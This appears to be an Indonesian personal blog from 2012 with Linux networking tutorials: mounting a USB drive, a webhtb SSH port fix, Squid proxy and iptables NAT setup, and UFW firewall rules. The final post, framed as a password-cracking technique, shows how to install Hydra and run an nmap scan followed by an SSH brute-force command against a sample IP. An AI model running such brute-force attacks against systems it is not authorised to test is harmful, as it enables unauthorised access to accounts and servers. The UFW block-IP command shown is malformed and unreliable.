Tuesday, 25 September 2012

DAFTAR NILAI UJIAN BULANAN (SEPTEMBER 2012) XII TKJ1

Berikut adalah nilainya (Mendisain sistem keamanan jaringan)



Friday, 14 September 2012

CARA COPY FILE/FOLDER DARI USB FLASHDISK PADA SISTEM OPERASI LINUX UBUNTU


KALi neh lagi males bertele-tele. Uda banyak sih artikelnya di internet, tapi sedikit berbagi gak apakan, kali neh tentang cara copy file/folder dari flasdisk di linux ubuntu melalui terminal ataupun command line (bukan gui lho).

MAri kita ke KTP, eh salah TKP
ketikan
#fdisk -l
maka akan muncul gambar berikut


perhatikan yang ditandai, itu adalah device nya, kemudian ketikan
#mount /dev/sdb1 /media


pada hasil diatas, usb flasdisk bernama KING, dan untuk masing-masing flasdisk pasti lain-lain. untuk masuk ke usb flasdisk nya, ketikan
#cd /media/KING
root@agus:/media/KING#

Dan untuk melihat isi flasdisk nya, ketikan
#ls
dan untuk mengcopy gunakan perintah cp

oke deh, seperti itu aja, maaf bila tidak memuaskan, dan salam trimakasih buat para pengunjung blog saya yang sangat sederhana.
TRimakasih, assalamu'alaikum...
By: Agus Wiana

Thursday, 13 September 2012

PERMASALAHAN TIDAK DAPAT LOGIN WEBHTB DI UBUNTU SERVER




Sempat pernah hampir install ulang webhtb dan ubuntu server gara-gara gak dapat login ke webhtb. Perasaan password nya uda bener tapi kok gak bisa login ya...?
Hmmmmm.. Ternyata masalahnya karna ubah-ubah port ssh nya..
Bagi rekan-rekan sekalian yang port default SSH dirubah dan tidak bisa
menggunakan webhtb, syukur
allhamdulillah, saya berhasil
ngoprek, nih trik-nya: file2 PHP yg berada di folder /var/
webhtb/Net/
ubah baris pada
file yg bersangkutan : file SSH1.php >>>
function Net_SSH1($host, $port = 22, $cipher = NET_SSH1_CIPHER_3DES) file SSH2.php >>>
function Net_SSH2($host, $port = 22) angka 22 boleh diubah
untuk disesuaikan dengan port SSH
yg sedang berjalan.
Dan hasilnya...
Bingo...

Trims buat para master ubuntu..
Maaf bila terdapat kesalahan..
Namanya juga masih awam..
Hihihi..
Salam salaman dari agus wiana.

Tuesday, 11 September 2012

INSTALL DAN KONFIGURASI SQUID PROXY SERVER DI UBUNTU MAVERICK




Sebenernya neh artikel uda lama pengen di posting, tapi belum sempat-sempat, sebenernya malas juga sih, hehehe.... alnya panjang banget, kayak si gery yang gk abis abis,, tapi mungkin tentang proxy server sudah banyak beserak di blog-blog ataupun website, tapi gak da salah nya juga kalau aku ikut serta, mana tau berguna. hhehehe.. oke deh cukup basi-basi nya.

Untuk defenisi proxy sendiri gak ku jabarkan, cuma install dan konfigurasi nya aja, kali neh ku coba dengan menggunakan mesin ubuntu 10.10 dengan asumsi sebagai berikut

Internet---MODEM—--Ubuntu server---HUB---CLIENT (192.168.0.2 s/d 192.168.0.xxx)
eth1 eth0
192.168.1.5 192.168.0.1

install terlebih dahulu squid nya
#apt-get install squid3

alasan menggunakan squid3 adalah, dalam ubuntu 10.10 tidak adanya file restart jika menggunakan squid jadi pakai squid3.

KONFIGURASI

A. Membuat NAT / Router

Agar client bisa terkoneksi dengan internet maka kita harus mengaktifkan ip forward. Hal ini bertujuan agar ppp0 atau eth0 bisa berkomunikasi dengan eth1 dan sebaliknya.

edit file /etc/sysctl.conf :

cari teks
# net.ipv4.ip_forward=1

Aktifkan dengan menghilangkan tanda “#”, menjadi :

net.ipv4.ip_forward=1

untuk meningkatan pengaman sebaiknya anti spoofing attack dan kernel map protect diaktifkan, cari teks2 dibawah ini...

# net.ipv4.conf.default.rp_filter=1

# net.ipv4.conf.all.rp_filter=1


Aktifkan dengan menghilangkan tanda “#”, menjadi:

net.ipv4.conf.default.rp_filter=1

net.ipv4.conf.all.rp_filter=1

kemudian save. Dan lakukan perintah untuk mengaktifkan konfigurasi tersebut

#sysctl -p

B. Membuat NAT dengan command iptables

#iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE

tapi lebih baik diketik script tersebut diketik di rc.local sebelum exit atau tepat diatas exit.
jika tidak diletakan di /etc/rc.local script tersebut hanya bersifat sementara, jika komputer restart, maka akan hilang.

keterangan :
-t nat adalah pembuatan tabel NAT pada iptables
-A POSTROUTING adalah menambah satu aturan baru pada bagian POSTROUTING
-j MASQUERADE adalah perintah ini akan mengarahkan rantai paket kebagian tertentu tanpa source.

Kemudian coba test ping ke client. JIka conec internet, tahap awal sukses.

C. KONFIGURASI SQUID

edit konfigurasi squid3
#nano /etc/squid3/squid.conf

cari http_port 3128
setelah ketemu hilangkan tanda pagarnya tambahkan kata transparent sehingga menjadi
http_port 3128 transparent

cari cache_mem
pada tutorial ini saya gunakan 16 MB

#Default:
cache_mem 16 MB

kemudian kita akan membuat acl (access control list) .
Cari acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
dan tepat di bawahnya ketikan

acl jaringan src 192.168.0.0/24
http_access allow jaringan

2 Baris diatas digunakan untuk memberikan access control ke jaringan 192.168.0.0 selain itu maka jaringan lain tidak akan bisa terkoneksi ke jaringan luar, karna tidak diizinkan oleh squid.


Berikutnya kita akan membuat content filter

cari acl CONNECT method CONNECT
dan tepat dibawahnya kita akan membuat acl yang baru, ketikan


acl tutup dstdomain "/etc/squid3/tutup"

http_access deny tutup


Simpan konfigurasi yang telah dibuat.

Buat file yang berisi alamat-alamat situs yang akan diblokir pada directory /etc/squid3/tutup. misalnya www.facebook,com dan sebagainya.
# nano /etc/squid3/tutup
Disini saya mencontohkan facebook.com dan twitter.com

Setelah itu simpan.

Kemudian restart squid
#/etc/init.d/squid3 restart
* Restarting Squid HTTP Proxy 3.x squid3 * Creating Squid HTTP Proxy 3.x cache structure
2012/09/11 11:36:52| Creating Swap Directories
[ OK ]
naaaaah langkah terakhir adalah.....
ketikan script berikut kedalam rc.local diatas exit

iptables -t nat -A PREROUTING -p tcp -s 192.168.0.0/24 --dport 80 -j REDIRECT --to-port 3128


#nano /etc/rc.local

iptables -t nat -A PREROUTING -p tcp -s 192.168.0.0/24 --dport 80 -j REDIRECT --to-port 3128

perintah script tersebut digunakan untuk membelokan semua paket yang berasal dari port 80 ke port 3128.

simpan konfigurasi yang telah dibuat.

Reboot server / restart server
#reboot

proxy server selesai di buat....................................


Hasil tes browser dari client



thanks,,,, Untuk para master ubuntu dan salam untuk pecinta ubuntu
selamat mencoba

BY : Agus Wiana

MEMBUAT FIREWALL DENGAN UFW DI UBUNTU

Hmmmmm,, sekedar iseng aja neh, ngisi waktu luang buat ngeblog,, yang di posting kali neh gak terlalu hebring, dan sudah banyak bertabur di blog-blog lain ataupu di website. Kali neh saya mau cerita dikit tentang firewall.
Dari wikipedia, firewall adalah suatu sistem perangkat lunak yang mengizinkan lalu lintas jaringan yang dianggap aman untuk bisa melaluinya dan mencegah lalu lintas jaringan yang dianggap tidak aman. Umumnya, sebuah tembok-api diterapkan dalam sebuah mesin terdedikasi, yang berjalan pada pintu gerbang (gateway) antara jaringan lokal dengan jaringan Internet.

Dan fungsi firewall adalah
* Mengatur dan mengontrol lalu lintas jaringan
* Melakukan autentikasi terhadap akses
* Melindungi sumber daya dalam jaringan privat
* Mencatat semua kejadian, dan melaporkan kepada administrator

Oke deh, neh mau share tentang membuat firewall sederhana dari mesin ubuntu dengan menggunakan UFW (Uncomplicated Firewall)
pertama-tama kita aktifkan terlebih dahulu
#ufw enable

maka akan muncul pesan yang menyatakan firewall telah aktif.
Dan untuk membuka akses port

#ufw allow 22

22 merupakan nomor port starndart ssh yang digunakan, jika ingin membuka akses port yang lain, ganti saja 22 menjadi angka port yang lain, misalnya
#ufw allow 80
#ufw allow 443
#ufw allow 25

80 port untuk http, dan 443 port untuk https, 25 port untuk email.

Dan jika untuk menutup port
#ufw deny 22

Jika ingin memblock suatu ip address, misalnya IP 192.168.0.6 yang menyebarkan virus via email, yang harus Anda lakukan Adalah
#insert 2 deny proto tcp from 192.168.0.6 to any port 25

untuk melihat status firewall
#ufw status

untuk menonaktifkan firewall
#ufw disable

Sekian dulu dari catatan yang sederhana ini, mohon maaf bila terdapat kesalahan, namanya juga masih belajar,
Thanks buat para master,,,

Salam Dari agus wiana.

Tuesday, 4 September 2012

TEKNIK JEBOL PASSWORD SERVER DENGAN CARA BRUTE FORCE ATTACK DENGAN MENGGUNAKAN HYDRA PADA OS UBUNTU




Brute force attack adalah sebuah metode untuk menebak suatu kunci dari sebuah enkripsi atau sebuah otentikasi dengan cara mencobanya berkali-kali dengan berbagai macam kombinasi huruf angka maupun simbol.

Cara Install Hydra :
kita membutuhkan beberapa file aplikasi untuk hydra.

#apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev \

libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev

kemudian download paket hydra di http://www.thc.org/releases/hydra-7.2-src.tar.gz

extract paket hydra
#tar -xzvf hydra-7.2-src.tar.gz
#cd hydra-7.2-src

./configure
make
make install


Cara menggunakan hydra :
#hydra -L “user list “ -P “word list” ip-target service PLAIN

keterangan :
-L digunakan jika kita mempunyai list user yang kemungkinan dipakek ( gak pakek -L juga boleh tapi harus disebut kan nama user nya, tapi harus huruf L kecil ( l ).
Contoh : -l admin
-P adalah wordlist yang kita gunakan / punya.
Ip target : Diisi target kita, misalnya router / asalkan ada IP termasuk service yang berjalan
Service : layanan yang terbuka.
PLAIN : Jika target kita tidak menggunakan https. Jika ada gunakan -S untuk melakukan koneksi SSL.

Untuk megetahui layanan yang terbuka dapat menggunakan nmap. Tapi harus nmap terlebih dahulu.

#nmap -sV iptarget

Contoh penggunaan hydra:
hydra -L /home/ehmhem/user.txt -P /home/ehmhem/password.lst 192.168.1.1 ssh PLAIN

Jika ada problem. mohon koment...

Mohon maaf jika ada kesalahan..

SELAMAT MENCOBA..
THANKS FOR ALL UBUNTU MASTER

BY : AGUS WIANA

visitors

Flag Counter

Pageviews from the past week